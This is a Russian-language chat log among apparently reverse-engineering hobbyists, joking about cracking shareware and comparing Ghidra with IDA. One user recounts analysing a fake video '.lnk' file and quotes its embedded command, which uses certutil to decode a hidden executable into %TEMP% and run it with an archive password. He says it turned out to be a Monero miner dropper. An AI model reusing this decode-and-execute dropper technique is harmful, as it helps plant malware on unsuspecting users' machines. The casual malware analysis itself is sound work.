Хотя да, пришлось хакнуть мейнфрейм DNS Гугла.

жжош

Код непатчен, некейгеннен.
Не анпакнут сэмпл.
ОЕР даже не найден,
но сосинчен сервер.

Непонятно только людям -
для чего старанья.
Лучше крякай шаровару -
исполняй желанья

Ну и заспавнился конеш

Но тема норм. Вчера сериальчики качал, в итоге скачал lnk файл на 780 мегабайт. Ну я такой бляя.. Выгружаю строки с этой ссылки, а там команда:
certutil -decode "kino.mkv.lnk" "%TEMP%\%USERNAME%.exe" && start "%USERNAME%" /b "%TEMP%\%USERNAME%.exe" "-pпароль_на_sfx"

Получается оно само себя пускает, а в хвосте этого файла есть PEM сертификат на 2 мегабайта. Ну я кароч такой декодировал, получил exe. Чекаю DIE, а там SFX. Ну пароль короче в lnk достаю, думаю буду анализировать очень крутой дропер, загружаю в гидру, а там.. monero майнер((((

не шаровара, но всё же

это гидра спугнула

не, по строкам видно что cryptonight и прочее говно

но всё же да, шото есть

у гидры? нравится её декомпилятор)

В сорцы прям не декомпилит, но даёт какие-то представления, при сильной оптимизации переименовываешь переменную и в итоге оно всё переименовывается всё что надо и не надо

и как оно на шароваре?

особенно на упакованной?

Хуй его знает, я питонист)

хех )

всё хочу такого вдумчивого гидромана найти и дать ему упакованную херню, как он её будет декомпилить,страдать...

пингани как найдёшь, интересно аж стало

и чтоб каждые 5 минут голос за кадром "хай, гидра!"

та шото пока никто не ведётся

а ида про лучше будет?

все такие любят гидру на своих игрушечных примерах